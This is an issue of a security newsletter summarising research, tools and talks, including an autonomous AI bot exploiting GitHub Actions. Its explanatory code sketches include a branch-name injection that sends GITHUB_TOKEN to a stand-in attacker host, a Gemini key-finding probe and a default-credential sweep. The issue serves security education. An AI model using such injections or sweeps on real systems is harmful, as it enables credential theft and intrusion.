
[tl;dr sec] #318 - Unprompted Talk Summaries, AI Bot Hacking GitHub Actions, AI Skills & Semgrep Rules

Slides + notes for the CodeMender and AI for Shai-Hulud response talks, an AI bot was autonomously hacking GitHub Actions, security-focused Skills and AI anti-pattern Semgrep rules

Hey there,

I hope you’ve been doing well!

🤖 [un]prompted

This week I had a blast at [un]prompted, the AI for security practitioners conference.

Gadi Evron assembled an incredible program committee that I was very fortunate to play a small role in. Aaron Zollman and many others put in countless hours in making this a great event.

And it showed: I think [un]prompted had one of the highest quality densities, in both talks and attendees, of any conference I’ve attended.

Some anecdotes:

  • I met a number of people whose work I’ve been a fan of for some time, which was super cool.

  • Overheard: “…and that’s how I got RCE on a satellite, and was basically able to make it do anything.”

  • I met someone who spent an internship looking for gold (not a metaphor).

  • Some people came up and said kind words about tl;dr sec 🥰 Which means a lot, and keeps me going all of those cold winter nights, huddled alone writing away by a small fire, kept warm solely by the heat of my laptop and fear of irrelevance.

  • Someone showed me their beautiful vibe coded Claude app dashboard estimating the stress/years of life toll of working in that environment, and comparing it to compensation.

  • One person said my including their work in tl;dr sec helped with their visa application 🤯 Very humbling.

  • Cheering on my friends who gave an excellent LLMs + SAST talk, and then seeing some of the online comments after (paraphrased), “Damn, what is Netflix putting in the food, those guys are jacked.” (Narrator: indeed they are)

There’s so much technical content I want to include from the conference, but I don’t have time to gather and organize it all before I need to send this out.

I’ll share the recordings once they’re live, which you should definitely check out.

Sponsor

📣 Stop the Google Workspace Security Whack-a-Mole

Most security teams don’t have a talent problem; they have a toil problem. From triaging user-reported phishing reports to chasing questionable OAuth grants to reviewing risky file sharing, your headcount is being swallowed by fragmented consoles and manual work. Material Security unifies your cloud workspace security, automating detection and response across email, files, and accounts. From stopping malicious email to revoking over-privileged app permissions without breaking workflows, Material simplifies SecOps. Stop scaling your team just to manage the noise. Focus on strategy, not ticket backlogs.

There are definitely a lot of toil-heavy aspects of monitoring and securing Google Workspace 🙃 Material has some nifty features; I got a nice walkthrough, which you can see here.

AppSec

Zero Knowledge (About) Encryption: A Comparative Security Analysis of Three Cloud-based Password Managers
ETH’s Matteo Scarlata et al. analyzed the cryptographic security of Bitwarden, LastPass, and Dashlane against a fully malicious server threat model, discovering 12 attacks against Bitwarden, 7 against LastPass, and 6 against Dashlane that violate their "Zero Knowledge Encryption" claims. The attacks range from targeted vault integrity violations to complete organizational vault compromise with password recovery.

Google API keys weren't secrets, but then Gemini changed the rules
Truffle Security's Joe Leon describes how Google spent over a decade telling developers that Google API keys (like those used in Maps, Firebase, etc.) are not secrets. But that's no longer true: Gemini accepts the same keys to access your private data. Truffle Security scanned millions of websites (the November 2025 Common Crawl dataset) and found nearly 3,000 Google API keys that now also authenticate to Gemini. With a valid key, an attacker can access uploaded files, cached data, and charge LLM usage to your account. They found many working keys, including Google’s old public API keys that could be used to access Google’s internal Gemini.
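To make the key-reuse finding concrete, here's a minimal sketch of the two-step idea (find candidate keys in crawled content, then probe whether they authenticate to the Generative Language API). This is not Truffle Security's tooling; the key-format regex is an assumption based on the commonly observed "AIza" + 35 URL-safe characters shape, and the probe only builds the request URL (actually sending it would test someone else's key, which you shouldn't do without authorization).

```python
import re
import urllib.parse

# Assumed Google API key shape: "AIza" prefix + 35 URL-safe characters.
# This is a commonly observed format, not an official specification.
KEY_RE = re.compile(r"AIza[0-9A-Za-z_\-]{35}")

def find_candidate_keys(text: str) -> list[str]:
    """Scan arbitrary text (e.g. crawled HTML/JS) for candidate API keys."""
    return KEY_RE.findall(text)

def gemini_probe_url(key: str) -> str:
    """Build the Gemini model-list URL; a 200 response with this key would
    indicate the key is also accepted by the Generative Language API."""
    return ("https://generativelanguage.googleapis.com/v1beta/models?"
            + urllib.parse.urlencode({"key": key}))
```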

Et Tu, Default Creds? Introducing Brutus for Modern Credential Testing
Praetorian’s Adam Crosser announces Brutus, a Go-based multi-protocol credential testing tool that aims to solve the drudgery of a) testing a large environment for default credentials across many services, and b) given compromised credentials or keys (e.g. SSH keys), determining all the systems you now have access to.

Brutus is a single binary with zero dependencies, supports 24 protocols including SSH, SMB, databases (MySQL, PostgreSQL, …), and web services. Brutus embeds known-compromised SSH keys from Rapid7's ssh-badkeys (Vagrant, F5, ExaGrid, etc.) for easy testing.

Brutus also has two experimental AI-powered features:

  1. Using an LLM to analyze HTTP responses and suggest vendor-specific default credentials for identified applications.

  2. Using headless Chrome with Claude’s vision API to navigate JavaScript-rendered login pages, identify the device, research credentials, and authenticate automatically.

💡 These AI features are good examples of functionality that would be prohibitively difficult before LLMs, and are now quite feasible. It’s good to periodically (at most monthly) reevaluate assumptions you used to have about what is reasonable to build.
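The core sweep (default credentials × services × hosts) is simple to sketch. This is a hypothetical Python illustration of the pattern, not Brutus's actual Go implementation: the credential lists are placeholders and the per-protocol check is an injected callable so the sweep stays self-contained.

```python
from concurrent.futures import ThreadPoolExecutor
from typing import Callable

# Placeholder default-credential lists per service (Brutus ships real ones).
DEFAULT_CREDS = {
    "ssh": [("root", "root"), ("admin", "admin")],
    "mysql": [("root", "")],
}

def sweep(targets, check: Callable[[str, str, str, str], bool], workers: int = 32):
    """Try each service's default credentials against each (host, service) pair."""
    hits = []  # list.append is atomic under the GIL, so this is thread-safe
    def attempt(host, service, user, password):
        if check(host, service, user, password):
            hits.append((host, service, user, password))
    with ThreadPoolExecutor(max_workers=workers) as pool:
        for host, service in targets:
            for user, password in DEFAULT_CREDS.get(service, []):
                pool.submit(attempt, host, service, user, password)
    return hits
```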

Sponsor

📣 The security platform that ships with your code

Arcjet brings security to the application layer so teams can block abuse while staying flexible as your architecture evolves. Rules live in code, not at the edge, making it easier to adapt protections as products, traffic patterns, and use cases change.

I think security-as-code is great, and moving security closer to engineering seems to be where things are headed 👌 

Cloud Security

The AWS Console and Terraform Security Gap
Include Security’s Laurence Tennant calls out a critical security gap where AWS resources created via Terraform and other API-driven tools inherit insecure legacy defaults, while the AWS Console enforces secure-by-default configurations. The post walks through 3 examples: RDS instances created without encryption (storage_encrypted defaults to false in Terraform), Lambda permissions vulnerable to Confused Deputy attacks when source_arn is omitted (Console requires it, API doesn't), and password policies that accidentally disable all strength requirements when partially configured.

The root cause is Terraform's reliance on the AWS SDK's legacy API defaults that prioritize backwards compatibility over security, while the Console has evolved to enforce better guardrails.
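The unencrypted-RDS default lends itself to a plan-time check. A minimal sketch, assuming the JSON layout emitted by `terraform show -json plan.out` (root module only, for brevity):

```python
import json

# Flag aws_db_instance resources where storage_encrypted is false or unset,
# i.e. where Terraform's insecure legacy default would apply.
def unencrypted_rds(plan_json: str) -> list[str]:
    plan = json.loads(plan_json)
    flagged = []
    resources = plan.get("planned_values", {}).get("root_module", {}).get("resources", [])
    for r in resources:
        if r.get("type") == "aws_db_instance":
            if not r.get("values", {}).get("storage_encrypted", False):
                flagged.append(r.get("address", "?"))
    return flagged
```

In practice you'd run this (or a policy-as-code equivalent like OPA/Sentinel rules) in CI before apply.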

AWS Incident Response: IAM Containment That Survives Eventual Consistency
OFFENSAI’s Eduard Agavriloae previously described how AWS IAM eventual consistency creates a ~4-second window that attackers can exploit to achieve persistence, even after defenders believe a compromised identity has been locked down. In this post, Eduard explains how to close this gap using Service Control Policies (SCPs) to make a quarantine policy irremovable during incident response.

The technique uses an SCP with the iam:PolicyArn condition key to prevent iam:DetachUserPolicy, iam:DetachRolePolicy, iam:DeletePolicy, iam:CreatePolicyVersion, and iam:SetDefaultPolicyVersion actions on IR-QuarantinePolicy by anyone except a designated break-glass IR role.
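A sketch of what that SCP might look like, expressed as a Python dict for readability. The policy name matches the post; the break-glass role name and ARN patterns are placeholders, and you should verify the exact condition-key behavior for each action before relying on this.

```python
import json

# Deny tampering with the quarantine policy unless the caller is the
# designated break-glass IR role. Names/ARNs here are illustrative.
QUARANTINE_SCP = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "ProtectQuarantinePolicy",
        "Effect": "Deny",
        "Action": [
            "iam:DetachUserPolicy",
            "iam:DetachRolePolicy",
            "iam:DeletePolicy",
            "iam:CreatePolicyVersion",
            "iam:SetDefaultPolicyVersion",
        ],
        "Resource": "*",
        "Condition": {
            # Only applies when the target is the quarantine policy...
            "ArnLike": {"iam:PolicyArn": "arn:aws:iam::*:policy/IR-QuarantinePolicy"},
            # ...and the caller is not the break-glass IR role.
            "ArnNotLike": {"aws:PrincipalArn": "arn:aws:iam::*:role/IR-BreakGlass"},
        },
    }],
}

print(json.dumps(QUARANTINE_SCP, indent=2))
```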

Supply Chain

Otsmane-Ahmed/KEIP
By Otsmane Ahmed: Kernel-Enforced Install-Time Policies (KEIP) uses eBPF LSM hooks to monitor and block malicious Python packages during pip install by enforcing behavioral rules, such as: blocking connections to non-standard ports (anything except 80/443/53), killing processes that contact more than 5 unique IPs, and terminating entire process groups when suspicious activity is detected.

💡 I’m not sure if eBPF/kernel level is the right approach for hooking and blocking malicious packages, but I’m sharing because it’s interesting.
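For intuition, here's a user-space simulation of the rules KEIP enforces; the real project does this in-kernel via eBPF LSM hooks, so this sketch only mirrors the policy logic (ports 80/443/53 allowed, kill after more than 5 unique destination IPs), not the enforcement mechanism.

```python
from collections import defaultdict

ALLOWED_PORTS = {80, 443, 53}   # per the post: block anything else
MAX_UNIQUE_IPS = 5              # per the post: kill after >5 unique IPs

class InstallMonitor:
    """Evaluate KEIP-style behavioral rules on outbound connections."""
    def __init__(self):
        self.ips_per_pid = defaultdict(set)

    def on_connect(self, pid: int, ip: str, port: int) -> str:
        if port not in ALLOWED_PORTS:
            return "block"      # non-standard port: block the connection
        self.ips_per_pid[pid].add(ip)
        if len(self.ips_per_pid[pid]) > MAX_UNIQUE_IPS:
            return "kill"       # fan-out to many IPs suggests beaconing/exfil
        return "allow"
```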

hackerbot-claw: An AI-Powered Bot Actively Exploiting GitHub Actions
StepSecurity's Varun Sharma breaks down the activity of an autonomous AI bot called hackerbot-claw that successfully exploited GitHub Actions workflows across 5 major repositories (Microsoft, DataDog, CNCF projects, and avelino/awesome-go).

hackerbot-claw used a number of different techniques: poisoned Go init() functions that exfiltrated a GITHUB_TOKEN with write permissions, inserting a backdoor into a Bash script that was automatically called when a GitHub issue comment included a specific command (/version), branch name injection using bash brace expansion, filename injection with base64-encoded payloads, and AI prompt injection against Claude Code.

The bot achieved RCE in 4 out of 5 targets by exploiting pull_request_target workflows with untrusted checkouts, missing author_association checks, and unsanitized ${{}} expression interpolation in shell contexts, with only Claude's prompt injection detection successfully blocking an attack.
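The `${{ }}` injection class is worth internalizing: GitHub substitutes expressions *textually* into the `run:` script before the shell ever executes, so attacker-controlled context (branch names, PR titles) becomes shell code. A simplified illustration of that substitution step (not GitHub's actual templating engine):

```python
import re

def render_run_step(template: str, context: dict) -> str:
    """Mimic GitHub Actions expression substitution (simplified)."""
    return re.sub(r"\$\{\{\s*(\S+?)\s*\}\}",
                  lambda m: context.get(m.group(1), ""), template)

# A workflow step that innocently echoes the PR's head branch:
workflow_step = 'echo "Building branch: ${{ github.head_ref }}"'

# An attacker names their branch so the substituted text closes the quote
# and appends a second command that exfiltrates the token:
malicious = 'x";curl https://attacker.example/$GITHUB_TOKEN;echo "'
rendered = render_run_step(workflow_step, {"github.head_ref": malicious})
# rendered: echo "Building branch: x";curl https://attacker.example/$GITHUB_TOKEN;echo ""
```

The standard fix is passing untrusted context through an `env:` variable and quoting it (`"$BRANCH"`), so the shell treats it as data rather than code.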

In one README, the bot added: "Just researchmaxxed the PAT that leaked cuz of the vuln and yeeted it on sight, no cap. Overpowered token? Revoked. You're safe now, king." 😂 

💡 TL;DR: A security-focused OpenClaw bot is actively and successfully finding and exploiting vulnerable GitHub Actions in popular repos 😅 What’s interesting about these specific examples is that none of them are really “new” attacks: both the vulnerable code patterns and the exploitation mechanisms have been discussed before. But AI agents are now able to search for, detect, and exploit these “known” vulnerable patterns automatically and at scale.

I keep harping on about this, but I want to emphasize it again here: another reason hackerbot-claw is able to successfully exploit these repos is that it can look at the code, form a hypothesis of an attack that might work, try it, get the feedback (did my callback endpoint get a ping? Did I extract the token? Did the workflow run output or bot comment indicate it had been compromised?), and keep trying if initially unsuccessful.

Red Team

syssec-utd/pylingual
A CPython bytecode decompiler supporting all released Python versions since 3.6. Research paper.

pyinstxtractor/pyinstxtractor-ng
Extracts contents from PyInstaller-generated executables (both Linux ELF and Windows PE) without requiring the same Python version used to build the binary. It leverages the xdis library to unmarshal Python bytecode.

Abusing Cortex XDR Live Terminal as a C2
InfoGuard’s Manuel Feifel demonstrates how Cortex XDR's Live Terminal feature can be abused as a pre-installed C2 channel, allowing command execution, PowerShell/Python execution, file upload/download, and process/file explorer capabilities, though it requires local admin privileges and bypassing default parent process prevention rules.

Manuel walks through his process unpacking cortex-xdr-payload.exe with pyinstxtractor-ng and decompiling with pylingual, discovering a hostname validation bypass (appending .paloaltonetworks.com to any URL path). Attackers can either hijack Live Terminal sessions cross-tenant by intercepting WebSocket messages containing server/token parameters, or build a custom WebSocket server that the payload will connect to after bypassing the hostname check.
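The hostname bypass is a classic bug class: a substring or suffix check on the raw URL can be satisfied by attacker-controlled *path* content, while a correct check must parse out the hostname first. A simplified sketch of the flaw (details of the actual Cortex XDR check are simplified here):

```python
from urllib.parse import urlparse

TRUSTED_SUFFIX = ".paloaltonetworks.com"

def naive_check(url: str) -> bool:
    # BUG: matches the trusted string anywhere in the URL, including the path
    return TRUSTED_SUFFIX in url

def strict_check(url: str) -> bool:
    # Parse the hostname out first, then compare against the trusted suffix
    host = urlparse(url).hostname or ""
    return host == TRUSTED_SUFFIX[1:] or host.endswith(TRUSTED_SUFFIX)

# Attacker server with the trusted suffix appended to the URL *path*:
evil = "wss://attacker.example/c2/x.paloaltonetworks.com"
# naive_check(evil) is True; strict_check(evil) is False
```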

AI + Security

GreatScott/enject
By Scott Novich: A Rust CLI tool that prevents AI coding assistants from reading plaintext secrets by storing only symbolic references (e.g., en://database_url) in .env files while keeping the actual values in per-project encrypted local stores that are injected directly into apps at runtime, never touching disk as plaintext.
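A hypothetical sketch of the symbolic-reference idea: the committed .env holds only `en://` pointers, and real values are resolved from a local store at runtime. (enject itself is Rust and encrypts its store; the store here is a plain dict purely for illustration, and the function names are mine, not enject's API.)

```python
SCHEME = "en://"

def resolve_env(dotenv: dict[str, str], store: dict[str, str]) -> dict[str, str]:
    """Replace en:// references with real values from the local store."""
    resolved = {}
    for key, value in dotenv.items():
        if value.startswith(SCHEME):
            resolved[key] = store[value[len(SCHEME):]]  # look up the real secret
        else:
            resolved[key] = value                        # pass plain values through
    return resolved

# An AI assistant reading the repo only ever sees the symbolic reference:
dotenv = {"DATABASE_URL": "en://database_url", "DEBUG": "1"}
```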

antropos17/Aegis
An open-source, local-only monitoring tool that watches AI agent behavior on your machine across processes (detects 106 agents), files (watches sensitive directories like .ssh, .env*, cloud configs, and agent config dirs), network (scans outbound TCP connections per agent PID), and local LLMs (detects Ollama and LM Studio). Aegis monitors what agents do after deployment rather than filtering prompts.

10 new skills from Trail of Bits
Including seatbelt-sandboxer (generate minimal macOS Seatbelt sandbox configs for apps), GitHub Action auditor, supply-chain-risk-auditor, skill-improver, workflow-skill-design, fp-check, and more.

semgrep/ai-best-practices
Semgrep rules that catch common trust & safety mistakes in LLM-powered applications: hardcoded API keys, missing safety checks, prompt injection risks, and unhandled errors across all major AI providers. 35 rules, 74 sub-rules, 6 providers (OpenAI, Anthropic, Google Gemini, Cohere, Mistral, and Hugging Face), 5 languages (Python, JS/TS, Go, Java, and Ruby).
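To illustrate one of the anti-pattern categories these rules target (the exact rule IDs and matching logic are in the repo; this before/after is just illustrative, with a placeholder key value):

```python
import os

# Flagged pattern: hardcoded provider API key in source
API_KEY = "sk-ant-xxxxxxxx"  # hypothetical placeholder value

# Preferred pattern: pull the key from the environment and fail loudly if absent
def get_api_key() -> str:
    key = os.environ.get("ANTHROPIC_API_KEY")
    if not key:
        raise RuntimeError("ANTHROPIC_API_KEY is not set")
    return key
```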

Advancing Code Security
I wrote a quick mini summary of this [un]prompted talk by Google’s Heather Adkins and John “Four” Flynn, along with my photos of their slides. They discussed CodeMender, Google’s project to automatically find and fix vulnerabilities, in a bit more detail than the original blog post. What especially stood out to me is the rigor with which they validate potential patches: they basically pass all candidate patches into a process that combines dynamic analysis (fuzzing, sanitizers), static analysis (AST-based, formal verification), differential testing, and LLM judges & critics. Super cool.

Zeal of the Convert: Taming Shai-Hulud with AI
I wrote a quick mini summary of this [un]prompted talk by Wiz’s Rami McCarthy, along with my photos of his slides (me writing summaries be like). Basically the talk is on how he leveraged AI + quickly vibe coded new automation and Skills to rapidly respond to the Shai-Hulud attack, attribute the affected companies, etc. Very practical with good lessons learned, I like it. Rami also released two Skills here.

💡 I believe Rami said he largely had to respond to Shai-Hulud while traveling with his partner. Feels bad man 😅 

AI's Impact on Software and Bug Bounty
Joseph Thacker believes the best bug bounty researchers are already using coding agents to find bugs faster, but that companies will soon adopt “hackbots” for code review and dynamic testing, and that overall bug reports to bug bounty programs will dwindle in the next few years.

Joseph also joined Justin Gardner on the Critical Thinking podcast (link) to interview HackerOne founder and CTO Alex Rice on bug bounty platforms training AI using bug bounty data / generally building their own AI-powered “pen testing agents.”

💡 Regardless of what the leaders of bug bounty companies say out loud, they are definitely full steam ahead trying to first build AI augmentation for testers, then gradually AI-powered full pen testing/bug bounty researchers. I’m sorry, believing otherwise is copium. If one company doesn’t, their competitors will.

I’ve been meaning to write a full blog post about this for a while, but I predict:

  • In the near future (this year), the top bug bounty researchers will build out their automation such that new/more junior researchers will rarely find non-duplicate bugs.

  • In 1-3 years, AI pen testing/red teaming companies will have products outcompeting all but the best bug bounty researchers. There will still be the crazy, intricate, one-off high-paying bounties that require deep human expertise and time, but I’m not sure there will be enough of those to support many full-time bug bounty researchers, or at least the effort/payout ratio may not be enough to justify being a full-time BB researcher.

Privacy

Quicklinks

Misc


AI

✉️ Wrapping Up

Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏

Thanks for reading!

Cheers,
Clint

P.S. Feel free to connect with me on LinkedIn 👋